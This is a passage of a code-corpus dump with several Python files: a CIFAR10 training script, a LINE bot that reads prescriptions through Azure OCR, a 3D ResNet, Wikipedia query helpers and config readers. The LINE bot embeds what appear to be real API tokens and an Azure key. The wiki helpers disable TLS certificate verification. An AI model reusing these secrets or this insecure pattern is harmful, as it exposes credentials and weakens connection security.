"call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "178944773", "text": "'''Train CIFAR10 with PyTorch.'''\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\n\nimport vgg\n\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\ntrain_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=True, download=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n normalize\n ])), batch_size=64, shuffle=True)\n\ntest_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n normalize])), batch_size=64, shuffle=False)\n\n\n# 开始训练,共训练 args.epochs 周期\ndef train(model, device, train_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n #\n criterion = nn.CrossEntropyLoss()\n loss = criterion(output, target)\n\n loss.backward()\n optimizer.step()\n if batch_idx % 100 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n\ndef test(model, device, test_loader):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n\n criterion = nn.CrossEntropyLoss()\n test_loss += criterion(output, target).item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n\nif __name__ == \"__main__\":\n\n epochs = 5\n use_cuda = True\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n model = vgg.VGG().to(device)\n\n save_model = True\n optimizer = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n\n for epoch in range(epochs):\n # 训练\n train(model, device, train_loader, optimizer, epoch)\n # 测试代码\n test(model, device, test_loader)\n\n # 如果设置保存模型,就开始保存模型,保存为 mnist_cnn.pt\n if save_model:\n torch.save(model.state_dict(), \"vgg.pt\")\n", "sub_path": "cifar/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torchvision.transforms.Normalize", "line_number": 9, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 12, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 12, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 14, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 19, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 19, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 20, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 67, "usage_type": "call"}, {"api_name": "vgg.VGG", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "47130625", "text": "# 載入相關套件\nfrom flask import Flask, request, abort\nfrom linebot import LineBotApi, WebhookHandler\nfrom linebot.exceptions import InvalidSignatureError\nfrom linebot.models import MessageEvent, TextMessage, TextSendMessage, ImageMessage\nfrom azure.ai.formrecognizer import FormRecognizerClient\nfrom azure.core.credentials import AzureKeyCredential\nfrom datetime import datetime\nimport re\nimport pandas as pd\n\n# create flask server\napp = Flask(__name__)\n# your linebot message API - Channel access token (from LINE Developer)\nline_bot_api = LineBotApi('T9vMMKzQTDhvdsFJWFDtjVKcI56KL0bx3cyKOTN8jN3AWG4lrzMRP1C3Sc69c+a08iHOeqHDkMOvDOSyqD5+zwCdqdSSHTDSBz2WGJ3nezkX5lLZ6A23tgNlwLRHl/X5mQaSt0UBvSPHJpFmp9hHiAdB04t89/1O/w1cDnyilFU=')\n# your linebot message API - Channel secret\nhandler = WebhookHandler('9bfda1bf917044c86fe056c26660e234')\n\n\n# linebot接收訊息\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n print('receive msg')\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. Please check your channel access token/channel secret.\")\n abort(400)\n return 'OK'\n\n# linebot處理文字訊息\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n # linebot回傳訊息\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text='收到您的訊息囉!'))\n\n\n# linebot處理照片訊息\n@handler.add(MessageEvent, message=ImageMessage)\ndef handle_image_message(event):\n # 使用者傳送的照片\n message_content = line_bot_api.get_message_content(event.message.id)\n\n # 照片儲存名稱\n fileName = event.message.id + '.jpg'\n\n # 儲存照片\n with open('./' + fileName, 'wb')as f:\n for chunk in message_content.iter_content():\n f.write(chunk)\n \n # Azure Form Recognizer\n endpoint = \"https://formfong.cognitiveservices.azure.com/\"\n credential = AzureKeyCredential(\"61e429884959460abc7c4955f3a108be\")\n\n form_recognizer_client = FormRecognizerClient(endpoint, credential)\n \n # 讀取圖片\n local_image = open('./' + fileName, 'rb')\n\n poller = form_recognizer_client.begin_recognize_content(local_image)\n form_pages = poller.result()\n\n datas = []\n for content in form_pages:\n for table in content.tables:\n for cell in table.cells:\n datas.append(cell.text)\n \n # 大寫字母O ---> 數字0\n for i in range(len(datas)):\n if len(datas[i]) == 10:\n datas[i] = datas[i].replace('O', '0')\n\n regex = re.compile(r'[A-Z,\\d]{2}\\d{6}[G,\\d]\\d')\n med_no = list(filter(regex.match, datas))\n \n result = ''\n for drug in med_no:\n A = [drug]\n df = pd.read_csv(\"notices.csv\")\n df_med = df[df[\"健保代碼\"].isin(A)]\n for (colname,colval) in df_med.iteritems():\n content = str('%s: %s,'%(colname, colval.values)) + '\\n'\n result += content\n \n # linebot測試回傳健保代碼 \n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=result))\n \n# 開始運作Flask\nif __name__ == \"__main__\":\n app.run(host='127.0.0.1', port=12345)", "sub_path": "linebot/appForm.py", "file_name": "appForm.py", "file_ext": "py", "file_size_in_byte": 3440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "linebot.LineBotApi", "line_number": 15, "usage_type": "call"}, {"api_name": "linebot.WebhookHandler", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "linebot.exceptions.InvalidSignatureError", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 36, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 45, "usage_type": "call"}, {"api_name": "linebot.models.MessageEvent", "line_number": 40, "usage_type": "argument"}, {"api_name": "linebot.models.TextMessage", "line_number": 40, "usage_type": "name"}, {"api_name": "azure.core.credentials.AzureKeyCredential", "line_number": 64, "usage_type": "call"}, {"api_name": "azure.ai.formrecognizer.FormRecognizerClient", "line_number": 66, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 85, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 91, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 100, "usage_type": "call"}, {"api_name": "linebot.models.MessageEvent", "line_number": 49, "usage_type": "argument"}, {"api_name": "linebot.models.ImageMessage", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "148338666", "text": "import torch.nn as nn\nimport math\nimport torch.utils.model_zoo as model_zoo\n\n\n__all__ = ['ResNet', 'resnet50']\n\n\nmodel_urls = {\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n}\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv3d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv3d(inplanes, planes, kernel_size=(3, 1, 1), padding=(1, 0, 0), bias=False)\n self.bn1 = nn.BatchNorm3d(planes)\n self.conv2 = nn.Conv3d(planes, planes, kernel_size=(1, 3, 3), stride=(1, stride, stride),\n padding=(0, 1, 1), bias=False)\n self.bn2 = nn.BatchNorm3d(planes)\n self.conv3 = nn.Conv3d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm3d(planes * 4)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=1000):\n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv3d(3, 64, kernel_size=(5, 7, 7), stride=(1, 2, 2), padding=(2, 3, 3),\n bias=False)\n self.bn1 = nn.BatchNorm3d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool3d(kernel_size=(1, 3, 3), stride=(1, 2, 2), padding=(0, 1, 1))\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.maxpool2 = nn.MaxPool3d(kernel_size=(3, 1, 1), stride=(2, 1, 1), padding=(1, 0, 0))\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3])\n self.avgpool = nn.AvgPool3d(kernel_size=(16, 14, 14), stride=1)\n self.dropout = nn.Dropout(p=0.3)\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n self.fc_in = 512 * block.expansion\n\n for m in self.modules():\n if isinstance(m, nn.Conv3d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm3d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv3d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=(1, stride, stride), bias=False),\n nn.BatchNorm3d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def replace_logits(self, num_classes):\n self.fc = nn.Linear(self.fc_in, num_classes)\n\n def forward(self, x):\n #print(x.shape)\n x = self.conv1(x)\n #print('conv1:', x.shape)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n #print('maxpool1:', x.shape)\n\n x = self.layer1(x)\n #print('layer1:', x.shape)\n x = self.maxpool2(x)\n #print('maxpool2:', x.shape)\n x = self.layer2(x)\n #print('layer2:', x.shape)\n x = self.layer3(x)\n #print('layer3:', x.shape)\n x = self.layer4(x)\n #print('layer4:', x.shape)\n\n x = self.avgpool(x)\n #print('avgpool:', x.shape)\n x = x.view(x.size(0), -1)\n #print('view:', x.shape)\n x = self.dropout(x)\n x = self.fc(x)\n\n return x\n\n\ndef resnet50(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)\n # if pretrained:\n # model.load_state_dict(model_zoo.load_url(model_urls['resnet50']))\n return model\n\n\nif __name__ == '__main__':\n import torch\n from torch.autograd import Variable\n x = Variable(torch.ones([1, 3, 32, 224, 224]))\n net = resnet50()\n net(x)\n", "sub_path": "resnet3d.py", "file_name": "resnet3d.py", "file_ext": "py", "file_size_in_byte": 5011, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Conv3d", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool3d", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool3d", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.AvgPool3d", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 80, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 152, "usage_type": "call"}]} +{"seq_id": "79512560", "text": "import ssl\nimport urllib.parse\nimport urllib.request\nimport json\n\n\ndef send_json_request_to_ruwiki(title, api_action):\n title = title.replace(' ', '_')\n title = urllib.parse.quote(title)\n url = 'http://ru.wikipedia.org/w/api.php?action=query&format=json&formatversion=2'\n url += '&titles='+title\n if not api_action.startswith('&'):\n url += '&'\n url += api_action\n\n context = ssl._create_unverified_context()\n req = urllib.request.Request(\n url,\n data=None,\n headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\n }\n )\n with urllib.request.urlopen(req, context=context, timeout=20.0) as request:\n return json.loads(request.read().decode('utf-8'))\n\n\ndef send_sparql_request(sparql):\n sparql = urllib.parse.quote(sparql)\n url = 'https://query.wikidata.org/sparql?format=json&query=' + sparql\n context = ssl._create_unverified_context()\n req = urllib.request.Request(\n url,\n data=None,\n headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\n }\n )\n\n with urllib.request.urlopen(req, context=context, timeout=60.0) as request:\n data = request.read().decode('utf-8')\n with open(\"sparql_raw_response.txt\", \"w\") as outp:\n outp.write(data)\n return json.loads(data)\n\n\ndef get_title_from_wiki_link(logger, url, normalize=False):\n prefix = 'https://ru.wikipedia.org/wiki/'\n if url.startswith(prefix):\n fio = url[len(prefix):]\n fio = urllib.parse.unquote(fio)\n fio = fio.replace('_', ' ')\n if normalize:\n response = send_json_request_to_ruwiki(fio, 'redirects')\n redirects = response.get('query', dict()).get('redirects', list())\n if len(redirects) > 0:\n return redirects[0]['to']\n normalized = response.get('query', dict()).get('normalized', list())\n if len(normalized) > 0:\n return normalized[0]['to']\n return fio\n else:\n logger.error(\"unknown link type {}\".format(url))\n return url\n\n\ndef get_wikidata_data_repository(wikidata_id):\n page = pywikibot.ItemPage(wikidata_id)\n return page.data_repository()\n\n", "sub_path": "tools/common/wiki_bots.py", "file_name": "wiki_bots.py", "file_ext": "py", "file_size_in_byte": 2400, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "urllib.parse.parse.quote", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 9, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 9, "usage_type": "name"}, {"api_name": "ssl._create_unverified_context", "line_number": 16, "usage_type": "call"}, {"api_name": "urllib.parse.request.Request", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 17, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 17, "usage_type": "name"}, {"api_name": "urllib.parse.request.urlopen", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 24, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 24, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.parse.parse.quote", "line_number": 29, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 29, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 29, "usage_type": "name"}, {"api_name": "ssl._create_unverified_context", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib.parse.request.Request", "line_number": 32, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 32, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 32, "usage_type": "name"}, {"api_name": "urllib.parse.request.urlopen", "line_number": 40, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 40, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 40, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.parse.parse.unquote", "line_number": 51, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 51, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "350416454", "text": "#!/usr/bin/env python\n# -*- encoding: utf8 -*-\n\n\"\"\"Support functions for config (.INI) file reading\n\nAuthor: Rudolf Cardinal (rudolf@pobox.com)\nCreated: 16 Apr 2015\nLast update: 24 Sep 2015\n\nCopyright/licensing:\n\n Copyright (C) 2015-2015 Rudolf Cardinal (rudolf@pobox.com).\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nfrom configparser import ConfigParser, NoOptionError\nfrom typing import Any, Iterable, List\n\n# =============================================================================\n# Config\n# =============================================================================\n\n\ndef get_config_string_option(parser: ConfigParser,\n section: str,\n option: str,\n default: str = None) -> str:\n if not parser.has_section(section):\n raise ValueError(\"config missing section: \" + section)\n return parser.get(section, option, fallback=default)\n\n\ndef read_config_string_options(obj: Any,\n parser: ConfigParser,\n section: str,\n options: Iterable[str],\n default: str = None) -> None:\n # enforce_str removed; ConfigParser always returns strings unless asked\n # specifically\n for o in options:\n setattr(obj, o, get_config_string_option(parser, section, o,\n default=default))\n\n\ndef get_config_multiline_option(parser: ConfigParser,\n section: str,\n option: str,\n default: List[str] = None) -> List[str]:\n default = default or []\n if not parser.has_section(section):\n raise ValueError(\"config missing section: \" + section)\n try:\n multiline = parser.get(section, option)\n values = [x.strip() for x in multiline.splitlines() if x.strip()]\n return values\n except NoOptionError:\n return default\n\n\ndef read_config_multiline_options(obj: Any,\n parser: ConfigParser,\n section: str,\n options: Iterable[str]) -> None:\n for o in options:\n setattr(obj, o, get_config_multiline_option(parser, section, o))\n\n\ndef get_config_bool_option(parser: ConfigParser,\n section: str,\n option: str,\n default: bool = None) -> bool:\n if not parser.has_section(section):\n raise ValueError(\"config missing section: \" + section)\n return parser.getboolean(section, option, fallback=default)\n", "sub_path": "cardinal_pythonlib/rnc_config.py", "file_name": "rnc_config.py", "file_ext": "py", "file_size_in_byte": 3193, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "configparser.ConfigParser", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 44, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 47, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}, {"api_name": "configparser.NoOptionError", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 71, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 74, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "42864238", "text": "import click\nimport webbrowser\nimport re\n\nfrom ..login import cluster_call, login_options\nfrom ..utils import add_param\nfrom ..format import print_output, format_options\nfrom ...identifier import Identifier\n\n\n@click.group(short_help='list, info, endpoints, collaborators, start, stop',\n epilog='Type \"ae5 deployment --help\" for help on a specific command.')\n@format_options()\n@login_options()\ndef deployment():\n pass\n\n\n@deployment.command()\n@click.argument('deployment', required=False)\n@format_options()\n@login_options()\ndef list(deployment):\n '''List available projects.\n\n By default, lists all projects visible to the authenticated user.\n Simple filters on owner, project name, or id can be performed by\n supplying an optional DEPLOYMENT argument. Filters on other fields may\n be applied using the --filter option.\n '''\n result = cluster_call('deployment_list', format='dataframe')\n if deployment:\n add_param('filter', Identifier.from_string(deployment).project_filter())\n print_output(result)\n\n\ndef single_deployment(deployment):\n ident = Identifier.from_string(deployment)\n return cluster_call('deployment_info', ident, format='dataframe')\n\n\n@deployment.command()\n@format_options()\n@login_options()\ndef endpoints():\n '''List all static endpoints.'''\n result = cluster_call('deployment_endpoints', format='dataframe')\n print_output(result)\n\n\n@deployment.command()\n@click.argument('deployment')\n@format_options()\n@login_options()\ndef info(deployment):\n '''Obtain information about a single deployment.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one project.\n '''\n result = single_deployment(deployment)\n print_output(result)\n\n\n@deployment.command()\n@click.argument('deployment')\n@click.option('--public', is_flag=True, help='Set the deployment to public.')\n@click.option('--private', is_flag=True, help='Set the deployment to private.')\n@format_options()\n@login_options()\ndef patch(deployment, public, private):\n '''Change the deployment's public/private status.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one deployment.\n '''\n if public and private:\n click.ClickException('Cannot specify both --public and --private')\n if not public and not private:\n public = None\n result = cluster_call('deployment_patch', deployment, public=public, format='dataframe')\n print_output(result)\n\n\n@deployment.command(short_help='Obtain information about a deployment\\'s collaborators.')\n@click.argument('deployment')\n@format_options()\n@login_options()\ndef collaborators(deployment):\n '''Obtain information about a deployment's collaborators.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one project.\n '''\n result = cluster_call('deployment_collaborators', deployment, format='dataframe')\n print_output(result)\n\n\n@deployment.command(short_help='Start a deployment for a project.')\n@click.argument('project')\n@click.option('--endpoint', type=str, required=False, help='Endpoint name.')\n@click.option('--resource-profile', help='The resource profile to use for this deployment.')\n@click.option('--public', is_flag=True, help='Make the deployment public.')\n@click.option('--private', is_flag=True, help='Make the deployment private (the default).')\n@click.option('--wait/--no-wait', default=True, help='Wait for the deployment to complete initialization before exiting.')\n@click.option('--open/--no-open', default=False, help='Open a browser upon initialization. Implies --wait.')\n@click.option('--frame/--no-frame', default=False, help='Include the AE banner when opening.')\n@format_options()\n@login_options()\n@click.pass_context\ndef start(ctx, project, endpoint, resource_profile, public, private, wait, open, frame):\n '''Start a deployment for a project.\n\n The PROJECT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one project.\n\n If the static endpoint is supplied, it must be of the form r'[A-Za-z0-9-]+',\n and it will be converted to lowercase. It must not match any endpoint with\n an active deployment, nor can it match any endpoint claimed by another project,\n even if that project has no active deployments. If the endpoint is not supplied,\n it will be autogenerated from the project name.\n\n By default, this command will wait for the completion of the deployment\n creation before returning. To return more quickly, use the --no-wait option.\n '''\n if public and private:\n click.ClickException('Cannot specify both --public and --private')\n prec = cluster_call('project_info', project, format='json')\n endpoints = cluster_call('deployment_endpoints', format='json')\n e_supplied = bool(endpoint)\n if not e_supplied:\n dedupe = True\n for e in endpoints:\n if e['project_id'] == prec['id']:\n if not e['deployment_id']:\n endpoint = e['id']\n dedupe = False\n break\n elif not endpoint:\n endpoint = e['id']\n if dedupe:\n if not endpoint:\n endpoint = re.sub(r'[^A-Za-z0-9-]', '', 